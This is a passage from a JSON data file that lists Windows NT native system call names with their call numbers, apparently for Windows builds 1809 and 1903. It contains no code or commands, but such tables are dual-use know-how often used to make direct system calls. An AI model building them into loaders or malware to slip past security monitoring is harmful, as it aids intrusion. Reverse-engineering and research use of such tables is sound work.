"NtCreateTimer2": 189, "NtCreateToken": 190, "NtCreateTokenEx": 191, "NtCreateTransaction": 192, "NtCreateTransactionManager": 193, "NtCreateUserProcess": 194, "NtCreateWaitCompletionPacket": 195, "NtCreateWaitablePort": 196, "NtCreateWnfStateName": 197, "NtCreateWorkerFactory": 198, "NtDebugActiveProcess": 199, "NtDebugContinue": 200, "NtDeleteAtom": 201, "NtDeleteBootEntry": 202, "NtDeleteDriverEntry": 203, "NtDeleteFile": 204, "NtDeleteKey": 205, "NtDeleteObjectAuditAlarm": 206, "NtDeletePrivateNamespace": 207, "NtDeleteValueKey": 208, "NtDeleteWnfStateData": 209, "NtDeleteWnfStateName": 210, "NtDisableLastKnownGood": 211, "NtDisplayString": 212, "NtDrawText": 213, "NtEnableLastKnownGood": 214, "NtEnumerateBootEntries": 215, "NtEnumerateDriverEntries": 216, "NtEnumerateSystemEnvironmentValuesEx": 217, "NtEnumerateTransactionObject": 218, "NtExtendSection": 219, "NtFilterBootOption": 220, "NtFilterToken": 221, "NtFilterTokenEx": 222, "NtFlushBuffersFileEx": 223, "NtFlushInstallUILanguage": 224, "NtFlushInstructionCache": 225, "NtFlushKey": 226, "NtFlushProcessWriteBuffers": 227, "NtFlushVirtualMemory": 228, "NtFlushWriteBuffer": 229, "NtFreeUserPhysicalPages": 230, "NtFreezeRegistry": 231, "NtFreezeTransactions": 232, "NtGetCachedSigningLevel": 233, "NtGetCompleteWnfStateSubscription": 234, "NtGetContextThread": 235, "NtGetCurrentProcessorNumber": 236, "NtGetCurrentProcessorNumberEx": 237, "NtGetDevicePowerState": 238, "NtGetMUIRegistryInfo": 239, "NtGetNextProcess": 240, "NtGetNextThread": 241, "NtGetNlsSectionPtr": 242, "NtGetNotificationResourceManager": 243, "NtGetWriteWatch": 244, "NtImpersonateAnonymousToken": 245, "NtImpersonateThread": 246, "NtInitializeEnclave": 247, "NtInitializeNlsFiles": 248, "NtInitializeRegistry": 249, "NtInitiatePowerAction": 250, "NtIsSystemResumeAutomatic": 251, "NtIsUILanguageComitted": 252, "NtListenPort": 253, "NtLoadDriver": 254, "NtLoadEnclaveData": 255, "NtLoadHotPatch": 256, "NtLoadKey": 257, "NtLoadKey2": 258, "NtLoadKeyEx": 259, "NtLockFile": 260, "NtLockProductActivationKeys": 261, "NtLockRegistryKey": 262, "NtLockVirtualMemory": 263, "NtMakePermanentObject": 264, "NtMakeTemporaryObject": 265, "NtManagePartition": 266, "NtMapCMFModule": 267, "NtMapUserPhysicalPages": 268, "NtMapViewOfSectionEx": 269, "NtModifyBootEntry": 270, "NtModifyDriverEntry": 271, "NtNotifyChangeDirectoryFile": 272, "NtNotifyChangeDirectoryFileEx": 273, "NtNotifyChangeKey": 274, "NtNotifyChangeMultipleKeys": 275, "NtNotifyChangeSession": 276, "NtOpenEnlistment": 277, "NtOpenEventPair": 278, "NtOpenIoCompletion": 279, "NtOpenJobObject": 280, "NtOpenKeyEx": 281, "NtOpenKeyTransacted": 282, "NtOpenKeyTransactedEx": 283, "NtOpenKeyedEvent": 284, "NtOpenMutant": 285, "NtOpenObjectAuditAlarm": 286, "NtOpenPartition": 287, "NtOpenPrivateNamespace": 288, "NtOpenProcessToken": 289, "NtOpenRegistryTransaction": 290, "NtOpenResourceManager": 291, "NtOpenSemaphore": 292, "NtOpenSession": 293, "NtOpenSymbolicLinkObject": 294, "NtOpenThread": 295, "NtOpenTimer": 296, "NtOpenTransaction": 297, "NtOpenTransactionManager": 298, "NtPlugPlayControl": 299, "NtPrePrepareComplete": 300, "NtPrePrepareEnlistment": 301, "NtPrepareComplete": 302, "NtPrepareEnlistment": 303, "NtPrivilegeCheck": 304, "NtPrivilegeObjectAuditAlarm": 305, "NtPrivilegedServiceAuditAlarm": 306, "NtPropagationComplete": 307, "NtPropagationFailed": 308, "NtPulseEvent": 309, "NtQueryAuxiliaryCounterFrequency": 310, "NtQueryBootEntryOrder": 311, "NtQueryBootOptions": 312, "NtQueryDebugFilterState": 313, "NtQueryDirectoryFileEx": 314, "NtQueryDirectoryObject": 315, "NtQueryDriverEntryOrder": 316, "NtQueryEaFile": 317, "NtQueryFullAttributesFile": 318, "NtQueryInformationAtom": 319, "NtQueryInformationByName": 320, "NtQueryInformationEnlistment": 321, "NtQueryInformationJobObject": 322, "NtQueryInformationPort": 323, "NtQueryInformationResourceManager": 324, "NtQueryInformationTransaction": 325, "NtQueryInformationTransactionManager": 326, "NtQueryInformationWorkerFactory": 327, "NtQueryInstallUILanguage": 328, "NtQueryIntervalProfile": 329, "NtQueryIoCompletion": 330, "NtQueryLicenseValue": 331, "NtQueryMultipleValueKey": 332, "NtQueryMutant": 333, "NtQueryOpenSubKeys": 334, "NtQueryOpenSubKeysEx": 335, "NtQueryPortInformationProcess": 336, "NtQueryQuotaInformationFile": 337, "NtQuerySecurityAttributesToken": 338, "NtQuerySecurityObject": 339, "NtQuerySecurityPolicy": 340, "NtQuerySemaphore": 341, "NtQuerySymbolicLinkObject": 342, "NtQuerySystemEnvironmentValue": 343, "NtQuerySystemEnvironmentValueEx": 344, "NtQuerySystemInformationEx": 345, "NtQueryTimerResolution": 346, "NtQueryWnfStateData": 347, "NtQueryWnfStateNameInformation": 348, "NtQueueApcThreadEx": 349, "NtRaiseException": 350, "NtRaiseHardError": 351, "NtReadOnlyEnlistment": 352, "NtRecoverEnlistment": 353, "NtRecoverResourceManager": 354, "NtRecoverTransactionManager": 355, "NtRegisterProtocolAddressInformation": 356, "NtRegisterThreadTerminatePort": 357, "NtReleaseKeyedEvent": 358, "NtReleaseWorkerFactoryWorker": 359, "NtRemoveIoCompletionEx": 360, "NtRemoveProcessDebug": 361, "NtRenameKey": 362, "NtRenameTransactionManager": 363, "NtReplaceKey": 364, "NtReplacePartitionUnit": 365, "NtReplyWaitReplyPort": 366, "NtRequestPort": 367, "NtResetEvent": 368, "NtResetWriteWatch": 369, "NtRestoreKey": 370, "NtResumeProcess": 371, "NtRevertContainerImpersonation": 372, "NtRollbackComplete": 373, "NtRollbackEnlistment": 374, "NtRollbackRegistryTransaction": 375, "NtRollbackTransaction": 376, "NtRollforwardTransactionManager": 377, "NtSaveKey": 378, "NtSaveKeyEx": 379, "NtSaveMergedKeys": 380, "NtSecureConnectPort": 381, "NtSerializeBoot": 382, "NtSetBootEntryOrder": 383, "NtSetBootOptions": 384, "NtSetCachedSigningLevel": 385, "NtSetCachedSigningLevel2": 386, "NtSetContextThread": 387, "NtSetDebugFilterState": 388, "NtSetDefaultHardErrorPort": 389, "NtSetDefaultLocale": 390, "NtSetDefaultUILanguage": 391, "NtSetDriverEntryOrder": 392, "NtSetEaFile": 393, "NtSetHighEventPair": 394, "NtSetHighWaitLowEventPair": 395, "NtSetIRTimer": 396, "NtSetInformationDebugObject": 397, "NtSetInformationEnlistment": 398, "NtSetInformationJobObject": 399, "NtSetInformationKey": 400, "NtSetInformationResourceManager": 401, "NtSetInformationSymbolicLink": 402, "NtSetInformationToken": 403, "NtSetInformationTransaction": 404, "NtSetInformationTransactionManager": 405, "NtSetInformationVirtualMemory": 406, "NtSetInformationWorkerFactory": 407, "NtSetIntervalProfile": 408, "NtSetIoCompletion": 409, "NtSetIoCompletionEx": 410, "NtSetLdtEntries": 411, "NtSetLowEventPair": 412, "NtSetLowWaitHighEventPair": 413, "NtSetQuotaInformationFile": 414, "NtSetSecurityObject": 415, "NtSetSystemEnvironmentValue": 416, "NtSetSystemEnvironmentValueEx": 417, "NtSetSystemInformation": 418, "NtSetSystemPowerState": 419, "NtSetSystemTime": 420, "NtSetThreadExecutionState": 421, "NtSetTimer2": 422, "NtSetTimerEx": 423, "NtSetTimerResolution": 424, "NtSetUuidSeed": 425, "NtSetVolumeInformationFile": 426, "NtSetWnfProcessNotificationEvent": 427, "NtShutdownSystem": 428, "NtShutdownWorkerFactory": 429, "NtSignalAndWaitForSingleObject": 430, "NtSinglePhaseReject": 431, "NtStartProfile": 432, "NtStopProfile": 433, "NtSubscribeWnfStateChange": 434, "NtSuspendProcess": 435, "NtSuspendThread": 436, "NtSystemDebugControl": 437, "NtTerminateEnclave": 438, "NtTerminateJobObject": 439, "NtTestAlert": 440, "NtThawRegistry": 441, "NtThawTransactions": 442, "NtTraceControl": 443, "NtTranslateFilePath": 444, "NtUmsThreadYield": 445, "NtUnloadDriver": 446, "NtUnloadKey": 447, "NtUnloadKey2": 448, "NtUnloadKeyEx": 449, "NtUnlockFile": 450, "NtUnlockVirtualMemory": 451, "NtUnmapViewOfSectionEx": 452, "NtUnsubscribeWnfStateChange": 453, "NtUpdateWnfStateData": 454, "NtVdmControl": 455, "NtWaitForAlertByThreadId": 456, "NtWaitForDebugEvent": 457, "NtWaitForKeyedEvent": 458, "NtWaitForWorkViaWorkerFactory": 459, "NtWaitHighEventPair": 460, "NtWaitLowEventPair": 461}, "1809": {"NtAccessCheck": 0, "NtWorkerFactoryWorkerReady": 1, "NtAcceptConnectPort": 2, "NtMapUserPhysicalPagesScatter": 3, "NtWaitForSingleObject": 4, "NtCallbackReturn": 5, "NtReadFile": 6, "NtDeviceIoControlFile": 7, "NtWriteFile": 8, "NtRemoveIoCompletion": 9, "NtReleaseSemaphore": 10, "NtReplyWaitReceivePort": 11, "NtReplyPort": 12, "NtSetInformationThread": 13, "NtSetEvent": 14, "NtClose": 15, "NtQueryObject": 16, "NtQueryInformationFile": 17, "NtOpenKey": 18, "NtEnumerateValueKey": 19, "NtFindAtom": 20, "NtQueryDefaultLocale": 21, "NtQueryKey": 22, "NtQueryValueKey": 23, "NtAllocateVirtualMemory": 24, "NtQueryInformationProcess": 25, "NtWaitForMultipleObjects32": 26, "NtWriteFileGather": 27, "NtSetInformationProcess": 28, "NtCreateKey": 29, "NtFreeVirtualMemory": 30, "NtImpersonateClientOfPort": 31, "NtReleaseMutant": 32, "NtQueryInformationToken": 33, "NtRequestWaitReplyPort": 34, "NtQueryVirtualMemory": 35, "NtOpenThreadToken": 36, "NtQueryInformationThread": 37, "NtOpenProcess": 38, "NtSetInformationFile": 39, "NtMapViewOfSection": 40, "NtAccessCheckAndAuditAlarm": 41, "NtUnmapViewOfSection": 42, "NtReplyWaitReceivePortEx": 43, "NtTerminateProcess": 44, "NtSetEventBoostPriority": 45, "NtReadFileScatter": 46, "NtOpenThreadTokenEx": 47, "NtOpenProcessTokenEx": 48, "NtQueryPerformanceCounter": 49, "NtEnumerateKey": 50, "NtOpenFile": 51, "NtDelayExecution": 52, "NtQueryDirectoryFile": 53, "NtQuerySystemInformation": 54, "NtOpenSection": 55, "NtQueryTimer": 56, "NtFsControlFile": 57, "NtWriteVirtualMemory": 58, "NtCloseObjectAuditAlarm": 59, "NtDuplicateObject": 60, "NtQueryAttributesFile": 61, "NtClearEvent": 62, "NtReadVirtualMemory": 63, "NtOpenEvent": 64, "NtAdjustPrivilegesToken": 65, "NtDuplicateToken": 66, "NtContinue": 67, "NtQueryDefaultUILanguage": 68, "NtQueueApcThread": 69, "NtYieldExecution": 70, "NtAddAtom": 71, "NtCreateEvent": 72, "NtQueryVolumeInformationFile": 73, "NtCreateSection": 74, "NtFlushBuffersFile": 75, "NtApphelpCacheControl": 76, "NtCreateProcessEx": 77, "NtCreateThread": 78, "NtIsProcessInJob": 79, "NtProtectVirtualMemory": 80, "NtQuerySection": 81, "NtResumeThread": 82, "NtTerminateThread": 83, "NtReadRequestData": 84, "NtCreateFile": 85, "NtQueryEvent": 86, "NtWriteRequestData": 87, "NtOpenDirectoryObject": 88, "NtAccessCheckByTypeAndAuditAlarm": 89, "NtQuerySystemTime": 90, "NtWaitForMultipleObjects": 91, "NtSetInformationObject": 92, "NtCancelIoFile": 93, "NtTraceEvent": 94, "NtPowerInformation": 95, "NtSetValueKey": 96, "NtCancelTimer": 97, "NtSetTimer": 98, "NtAccessCheckByType": 99, "NtAccessCheckByTypeResultList": 100, "NtAccessCheckByTypeResultListAndAuditAlarm": 101, "NtAccessCheckByTypeResultListAndAuditAlarmByHandle": 102, "NtAcquireProcessActivityReference": 103, "NtAddAtomEx": 104, "NtAddBootEntry": 105, "NtAddDriverEntry": 106, "NtAdjustGroupsToken": 107, "NtAdjustTokenClaimsAndDeviceGroups": 108, "NtAlertResumeThread": 109, "NtAlertThread": 110, "NtAlertThreadByThreadId": 111, "NtAllocateLocallyUniqueId": 112, "NtAllocateReserveObject": 113, "NtAllocateUserPhysicalPages": 114, "NtAllocateUuids": 115, "NtAllocateVirtualMemoryEx": 116, "NtAlpcAcceptConnectPort": 117, "NtAlpcCancelMessage": 118, "NtAlpcConnectPort": 119, "NtAlpcConnectPortEx": 120, "NtAlpcCreatePort": 121, "NtAlpcCreatePortSection": 122, "NtAlpcCreateResourceReserve": 123, "NtAlpcCreateSectionView": 124, "NtAlpcCreateSecurityContext": 125, "NtAlpcDeletePortSection": 126, "NtAlpcDeleteResourceReserve": 127, "NtAlpcDeleteSectionView": 128, "NtAlpcDeleteSecurityContext": 129, "NtAlpcDisconnectPort": 130, "NtAlpcImpersonateClientContainerOfPort": 131, "NtAlpcImpersonateClientOfPort": 132, "NtAlpcOpenSenderProcess": 133, "NtAlpcOpenSenderThread": 134, "NtAlpcQueryInformation": 135, "NtAlpcQueryInformationMessage": 136, "NtAlpcRevokeSecurityContext": 137, "NtAlpcSendWaitReceivePort": 138, "NtAlpcSetInformation": 139, "NtAreMappedFilesTheSame": 140, "NtAssignProcessToJobObject": 141, "NtAssociateWaitCompletionPacket": 142, "NtCallEnclave": 143, "NtCancelIoFileEx": 144, "NtCancelSynchronousIoFile": 145, "NtCancelTimer2": 146, "NtCancelWaitCompletionPacket": 147, "NtCommitComplete": 148, "NtCommitEnlistment": 149, "NtCommitRegistryTransaction": 150, "NtCommitTransaction": 151, "NtCompactKeys": 152, "NtCompareObjects": 153, "NtCompareSigningLevels": 154, "NtCompareTokens": 155, "NtCompleteConnectPort": 156, "NtCompressKey": 157, "NtConnectPort": 158, "NtConvertBetweenAuxiliaryCounterAndPerformanceCounter": 159, "NtCreateDebugObject": 160, "NtCreateDirectoryObject": 161, "NtCreateDirectoryObjectEx": 162, "NtCreateEnclave": 163, "NtCreateEnlistment": 164, "NtCreateEventPair": 165, "NtCreateIRTimer": 166, "NtCreateIoCompletion": 167, "NtCreateJobObject": 168, "NtCreateJobSet": 169, "NtCreateKeyTransacted": 170, "NtCreateKeyedEvent": 171, "NtCreateLowBoxToken": 172, "NtCreateMailslotFile": 173, "NtCreateMutant": 174, "NtCreateNamedPipeFile": 175, "NtCreatePagingFile": 176, "NtCreatePartition": 177, "NtCreatePort": 178, "NtCreatePrivateNamespace": 179, "NtCreateProcess": 180, "NtCreateProfile": 181, "NtCreateProfileEx": 182, "NtCreateRegistryTransaction": 183, "NtCreateResourceManager": 184, "NtCreateSectionEx": 185, "NtCreateSemaphore": 186, "NtCreateSymbolicLinkObject": 187, "NtCreateThreadEx": 188, "NtCreateTimer": 189, "NtCreateTimer2": 190, "NtCreateToken": 191, "NtCreateTokenEx": 192, "NtCreateTransaction": 193, "NtCreateTransactionManager": 194, "NtCreateUserProcess": 195, "NtCreateWaitCompletionPacket": 196, "NtCreateWaitablePort": 197, "NtCreateWnfStateName": 198, "NtCreateWorkerFactory": 199, "NtDebugActiveProcess": 200, "NtDebugContinue": 201, "NtDeleteAtom": 202, "NtDeleteBootEntry": 203, "NtDeleteDriverEntry": 204, "NtDeleteFile": 205, "NtDeleteKey": 206, "NtDeleteObjectAuditAlarm": 207, "NtDeletePrivateNamespace": 208, "NtDeleteValueKey": 209, "NtDeleteWnfStateData": 210, "NtDeleteWnfStateName": 211, "NtDisableLastKnownGood": 212, "NtDisplayString": 213, "NtDrawText": 214, "NtEnableLastKnownGood": 215, "NtEnumerateBootEntries": 216, "NtEnumerateDriverEntries": 217, "NtEnumerateSystemEnvironmentValuesEx": 218, "NtEnumerateTransactionObject": 219, "NtExtendSection": 220, "NtFilterBootOption": 221, "NtFilterToken": 222, "NtFilterTokenEx": 223, "NtFlushBuffersFileEx": 224, "NtFlushInstallUILanguage": 225, "NtFlushInstructionCache": 226, "NtFlushKey": 227, "NtFlushProcessWriteBuffers": 228, "NtFlushVirtualMemory": 229, "NtFlushWriteBuffer": 230, "NtFreeUserPhysicalPages": 231, "NtFreezeRegistry": 232, "NtFreezeTransactions": 233, "NtGetCachedSigningLevel": 234, "NtGetCompleteWnfStateSubscription": 235, "NtGetContextThread": 236, "NtGetCurrentProcessorNumber": 237, "NtGetCurrentProcessorNumberEx": 238, "NtGetDevicePowerState": 239, "NtGetMUIRegistryInfo": 240, "NtGetNextProcess": 241, "NtGetNextThread": 242, "NtGetNlsSectionPtr": 243, "NtGetNotificationResourceManager": 244, "NtGetWriteWatch": 245, "NtImpersonateAnonymousToken": 246, "NtImpersonateThread": 247, "NtInitializeEnclave": 248, "NtInitializeNlsFiles": 249, "NtInitializeRegistry": 250, "NtInitiatePowerAction": 251, "NtIsSystemResumeAutomatic": 252, "NtIsUILanguageComitted": 253, "NtListenPort": 254, "NtLoadDriver": 255, "NtLoadEnclaveData": 256, "NtLoadKey": 257, "NtLoadKey2": 258, "NtLoadKeyEx": 259, "NtLockFile": 260, "NtLockProductActivationKeys": 261, "NtLockRegistryKey": 262, "NtLockVirtualMemory": 263, "NtMakePermanentObject": 264, "NtMakeTemporaryObject": 265, "NtManageHotPatch": 266, "NtManagePartition": 267, "NtMapCMFModule": 268, "NtMapUserPhysicalPages": 269, "NtMapViewOfSectionEx": 270, "NtModifyBootEntry": 271, "NtModifyDriverEntry": 272, "NtNotifyChangeDirectoryFile": 273, "NtNotifyChangeDirectoryFileEx": 274, "NtNotifyChangeKey": 275, "NtNotifyChangeMultipleKeys": 276, "NtNotifyChangeSession": 277, "NtOpenEnlistment": 278, "NtOpenEventPair": 279, "NtOpenIoCompletion": 280, "NtOpenJobObject": 281, "NtOpenKeyEx": 282, "NtOpenKeyTransacted": 283, "NtOpenKeyTransactedEx": 284, "NtOpenKeyedEvent": 285, "NtOpenMutant": 286, "NtOpenObjectAuditAlarm": 287, "NtOpenPartition": 288, "NtOpenPrivateNamespace": 289, "NtOpenProcessToken": 290, "NtOpenRegistryTransaction": 291, "NtOpenResourceManager": 292, "NtOpenSemaphore": 293, "NtOpenSession": 294, "NtOpenSymbolicLinkObject": 295, "NtOpenThread": 296, "NtOpenTimer": 297, "NtOpenTransaction": 298, "NtOpenTransactionManager": 299, "NtPlugPlayControl": 300, "NtPrePrepareComplete": 301, "NtPrePrepareEnlistment": 302, "NtPrepareComplete": 303, "NtPrepareEnlistment": 304, "NtPrivilegeCheck": 305, "NtPrivilegeObjectAuditAlarm": 306, "NtPrivilegedServiceAuditAlarm": 307, "NtPropagationComplete": 308, "NtPropagationFailed": 309, "NtPulseEvent": 310, "NtQueryAuxiliaryCounterFrequency": 311, "NtQueryBootEntryOrder": 312, "NtQueryBootOptions": 313, "NtQueryDebugFilterState": 314, "NtQueryDirectoryFileEx": 315, "NtQueryDirectoryObject": 316, "NtQueryDriverEntryOrder": 317, "NtQueryEaFile": 318, "NtQueryFullAttributesFile": 319, "NtQueryInformationAtom": 320, "NtQueryInformationByName": 321, "NtQueryInformationEnlistment": 322, "NtQueryInformationJobObject": 323, "NtQueryInformationPort": 324, "NtQueryInformationResourceManager": 325, "NtQueryInformationTransaction": 326, "NtQueryInformationTransactionManager": 327, "NtQueryInformationWorkerFactory": 328, "NtQueryInstallUILanguage": 329, "NtQueryIntervalProfile": 330, "NtQueryIoCompletion": 331, "NtQueryLicenseValue": 332, "NtQueryMultipleValueKey": 333, "NtQueryMutant": 334, "NtQueryOpenSubKeys": 335, "NtQueryOpenSubKeysEx": 336, "NtQueryPortInformationProcess": 337, "NtQueryQuotaInformationFile": 338, "NtQuerySecurityAttributesToken": 339, "NtQuerySecurityObject": 340, "NtQuerySecurityPolicy": 341, "NtQuerySemaphore": 342, "NtQuerySymbolicLinkObject": 343, "NtQuerySystemEnvironmentValue": 344, "NtQuerySystemEnvironmentValueEx": 345, "NtQuerySystemInformationEx": 346, "NtQueryTimerResolution": 347, "NtQueryWnfStateData": 348, "NtQueryWnfStateNameInformation": 349, "NtQueueApcThreadEx": 350, "NtRaiseException": 351, "NtRaiseHardError": 352, "NtReadOnlyEnlistment": 353, "NtRecoverEnlistment": 354, "NtRecoverResourceManager": 355, "NtRecoverTransactionManager": 356, "NtRegisterProtocolAddressInformation": 357, "NtRegisterThreadTerminatePort": 358, "NtReleaseKeyedEvent": 359, "NtReleaseWorkerFactoryWorker": 360, "NtRemoveIoCompletionEx": 361, "NtRemoveProcessDebug": 362, "NtRenameKey": 363, "NtRenameTransactionManager": 364, "NtReplaceKey": 365, "NtReplacePartitionUnit": 366, "NtReplyWaitReplyPort": 367, "NtRequestPort": 368, "NtResetEvent": 369, "NtResetWriteWatch": 370, "NtRestoreKey": 371, "NtResumeProcess": 372, "NtRevertContainerImpersonation": 373, "NtRollbackComplete": 374, "NtRollbackEnlistment": 375, "NtRollbackRegistryTransaction": 376, "NtRollbackTransaction": 377, "NtRollforwardTransactionManager": 378, "NtSaveKey": 379, "NtSaveKeyEx": 380, "NtSaveMergedKeys": 381, "NtSecureConnectPort": 382, "NtSerializeBoot": 383, "NtSetBootEntryOrder": 384, "NtSetBootOptions": 385, "NtSetCachedSigningLevel": 386, "NtSetCachedSigningLevel2": 387, "NtSetContextThread": 388, "NtSetDebugFilterState": 389, "NtSetDefaultHardErrorPort": 390, "NtSetDefaultLocale": 391, "NtSetDefaultUILanguage": 392, "NtSetDriverEntryOrder": 393, "NtSetEaFile": 394, "NtSetHighEventPair": 395, "NtSetHighWaitLowEventPair": 396, "NtSetIRTimer": 397, "NtSetInformationDebugObject": 398, "NtSetInformationEnlistment": 399, "NtSetInformationJobObject": 400, "NtSetInformationKey": 401, "NtSetInformationResourceManager": 402, "NtSetInformationSymbolicLink": 403, "NtSetInformationToken": 404, "NtSetInformationTransaction": 405, "NtSetInformationTransactionManager": 406, "NtSetInformationVirtualMemory": 407, "NtSetInformationWorkerFactory": 408, "NtSetIntervalProfile": 409, "NtSetIoCompletion": 410, "NtSetIoCompletionEx": 411, "NtSetLdtEntries": 412, "NtSetLowEventPair": 413, "NtSetLowWaitHighEventPair": 414, "NtSetQuotaInformationFile": 415, "NtSetSecurityObject": 416, "NtSetSystemEnvironmentValue": 417, "NtSetSystemEnvironmentValueEx": 418, "NtSetSystemInformation": 419, "NtSetSystemPowerState": 420, "NtSetSystemTime": 421, "NtSetThreadExecutionState": 422, "NtSetTimer2": 423, "NtSetTimerEx": 424, "NtSetTimerResolution": 425, "NtSetUuidSeed": 426, "NtSetVolumeInformationFile": 427, "NtSetWnfProcessNotificationEvent": 428, "NtShutdownSystem": 429, "NtShutdownWorkerFactory": 430, "NtSignalAndWaitForSingleObject": 431, "NtSinglePhaseReject": 432, "NtStartProfile": 433, "NtStopProfile": 434, "NtSubscribeWnfStateChange": 435, "NtSuspendProcess": 436, "NtSuspendThread": 437, "NtSystemDebugControl": 438, "NtTerminateEnclave": 439, "NtTerminateJobObject": 440, "NtTestAlert": 441, "NtThawRegistry": 442, "NtThawTransactions": 443, "NtTraceControl": 444, "NtTranslateFilePath": 445, "NtUmsThreadYield": 446, "NtUnloadDriver": 447, "NtUnloadKey": 448, "NtUnloadKey2": 449, "NtUnloadKeyEx": 450, "NtUnlockFile": 451, "NtUnlockVirtualMemory": 452, "NtUnmapViewOfSectionEx": 453, "NtUnsubscribeWnfStateChange": 454, "NtUpdateWnfStateData": 455, "NtVdmControl": 456, "NtWaitForAlertByThreadId": 457, "NtWaitForDebugEvent": 458, "NtWaitForKeyedEvent": 459, "NtWaitForWorkViaWorkerFactory": 460, "NtWaitHighEventPair": 461, "NtWaitLowEventPair": 462}, "1903": {"NtAccessCheck": 0, "NtWorkerFactoryWorkerReady": 1, "NtAcceptConnectPort": 2, "NtMapUserPhysicalPagesScatter": 3, "NtWaitForSingleObject": 4, "NtCallbackReturn": 5, "NtReadFile": 6, "NtDeviceIoControlFile": 7, "NtWriteFile": 8, "NtRemoveIoCompletion": 9, "NtReleaseSemaphore": 10, "NtReplyWaitReceivePort": 11, "NtReplyPort": 12, "NtSetInformationThread": 13, "NtSetEvent": 14, "NtClose": 15, "NtQueryObject": 16, "NtQueryInformationFile": 17, "NtOpenKey": 18, "NtEnumerateValueKey": 19, "NtFindAtom": 20, "NtQueryDefaultLocale": 21, "NtQueryKey": 22, "NtQueryValueKey": 23, "NtAllocateVirtualMemory": 24, "NtQueryInformationProcess": 25, "NtWaitForMultipleObjects32": 26, "NtWriteFileGather": 27, "NtSetInformationProcess": 28, "NtCreateKey": 29, "NtFreeVirtualMemory": 30, "NtImpersonateClientOfPort": 31, "NtReleaseMutant": 32, "NtQueryInformationToken": 33, "NtRequestWaitReplyPort": 34, "NtQueryVirtualMemory": 35, "NtOpenThreadToken": 36, "NtQueryInformationThread": 37, "NtOpenProcess": 38, "NtSetInformationFile": 39, "NtMapViewOfSection": 40, "NtAccessCheckAndAuditAlarm": 41, "NtUnmapViewOfSection": 42, "NtReplyWaitReceivePortEx": 43, "NtTerminateProcess": 44, "NtSetEventBoostPriority": 45, "NtReadFileScatter": 46, "NtOpenThreadTokenEx": 47, "NtOpenProcessTokenEx": 48, "NtQueryPerformanceCounter": 49, "NtEnumerateKey": 50, "NtOpenFile": 51, "NtDelayExecution": 52, "NtQueryDirectoryFile": 53, "NtQuerySystemInformation": 54, "NtOpenSection": 55, "NtQueryTimer": 56, "NtFsControlFile": 57, "NtWriteVirtualMemory": 58, "NtCloseObjectAuditAlarm": 59, "NtDuplicateObject": 60, "NtQueryAttributesFile": 61, "NtClearEvent": 62, "NtReadVirtualMemory": 63, "NtOpenEvent": 64, "NtAdjustPrivilegesToken": 65, "NtDuplicateToken": 66, "NtContinue": 67, "NtQueryDefaultUILanguage": 68, "NtQueueApcThread": 69, "NtYieldExecution": 70, "NtAddAtom": 71, "NtCreateEvent": 72, "NtQueryVolumeInformationFile": 73, "NtCreateSection": 74, "NtFlushBuffersFile": 75, "NtApphelpCacheControl": 76, "NtCreateProcessEx": 77, "NtCreateThread": 78, "NtIsProcessInJob": 79, "NtProtectVirtualMemory": 80, "NtQuerySection": 81, "NtResumeThread": 82, "NtTerminateThread": 83, "NtReadRequestData": 84, "NtCreateFile": 85, "NtQueryEvent": 86, "NtWriteRequestData": 87, "NtOpenDirectoryObject": 88, "NtAccessCheckByTypeAndAuditAlarm": 89, "NtQuerySystemTime": 90, "NtWaitForMultipleObjects": 91, "NtSetInformationObject": 92, "NtCancelIoFile": 93, "NtTraceEvent": 94, "NtPowerInformation": 95, "NtSetValueKey": 96, "NtCancelTimer": 97, "NtSetTimer": 98, "NtAccessCheckByType": 99, "NtAccessCheckByTypeResultList": 100, "NtAccessCheckByTypeResultListAndAuditAlarm": 101, "NtAccessCheckByTypeResultListAndAuditAlarmByHandle": 102, "NtAcquireProcessActivityReference": 103, "NtAddAtomEx": 104, "NtAddBootEntry": 105, "NtAddDriverEntry": 106, "NtAdjustGroupsToken": 107, "NtAdjustTokenClaimsAndDeviceGroups": 108, "NtAlertResumeThread": 109, "NtAlertThread": 110, "NtAlertThreadByThreadId": 111, "NtAllocateLocallyUniqueId": 112, "NtAllocateReserveObject": 113, "NtAllocateUserPhysicalPages": 114, "NtAllocateUuids": 115, "NtAllocateVirtualMemoryEx": 116, "NtAlpcAcceptConnectPort": 117, "NtAlpcCancelMessage": 118, "NtAlpcConnectPort": 119, "NtAlpcConnectPortEx": 120, "NtAlpcCreatePort": 121, "NtAlpcCreatePortSection": 122, "NtAlpcCreateResourceReserve": 123, "NtAlpcCreateSectionView": 124, "NtAlpcCreateSecurityContext": 125, "NtAlpcDeletePortSection": 126, "NtAlpcDeleteResourceReserve": 127, "NtAlpcDeleteSectionView": 128, "NtAlpcDeleteSecurityContext": 129, "NtAlpcDisconnectPort": 130, "NtAlpcImpersonateClientContainerOfPort": 131, "NtAlpcImpersonateClientOfPort": 132, "NtAlpcOpenSenderProcess": 133, "NtAlpcOpenSenderThread": 134, "NtAlpcQueryInformation": 135, "NtAlpcQueryInformationMessage": 136, "NtAlpcRevokeSecurityContext": 137, "NtAlpcSendWaitReceivePort": 138, "NtAlpcSetInformation": 139, "NtAreMappedFilesTheSame": 140, "NtAssignProcessToJobObject": 141, "NtAssociateWaitCompletionPacket": 142, "NtCallEnclave": 143, "NtCancelIoFileEx": 144, "NtCancelSynchronousIoFile": 145, "NtCancelTimer2": 146, "NtCancelWaitCompletionPacket": 147, "NtCommitComplete": 148, "NtCommitEnlistment": 149, "NtCommitRegistryTransaction": 150, "NtCommitTransaction": 151, "NtCompactKeys": 152, "NtCompareObjects": 153, "NtCompareSigningLevels": 154, "NtCompareTokens": 155, "NtCompleteConnectPort": 156, "NtCompressKey": 157, "NtConnectPort": 158, "NtConvertBetweenAuxiliaryCounterAndPerformanceCounter": 159, "NtCreateCrossVmEvent": 160, "NtCreateDebugObject": 161, "NtCreateDirectoryObject": 162, "NtCreateDirectoryObjectEx": 163, "NtCreateEnclave": 164, "NtCreateEnlistment": 165, "NtCreateEventPair": 166, "NtCreateIRTimer": 167, "NtCreateIoCompletion": 168, "NtCreateJobObject": 169, "NtCreateJobSet": 170, "NtCreateKeyTransacted": 171, "NtCreateKeyedEvent": 172, "NtCreateLowBoxToken": 173, "NtCreateMailslotFile": 174, "NtCreateMutant": 175, "NtCreateNamedPipeFile": 176, "NtCreatePagingFile": 177, "NtCreatePartition": 178, "NtCreatePort": 179, "NtCreatePrivateNamespace": 180, "NtCreateProcess": 181, "NtCreateProfile": 182, "NtCreateProfileEx": 183, "NtCreateRegistryTransaction": 184, "NtCreateResourceManager": 185, "NtCreateSectionEx": 186, "NtCreateSemaphore": 187, 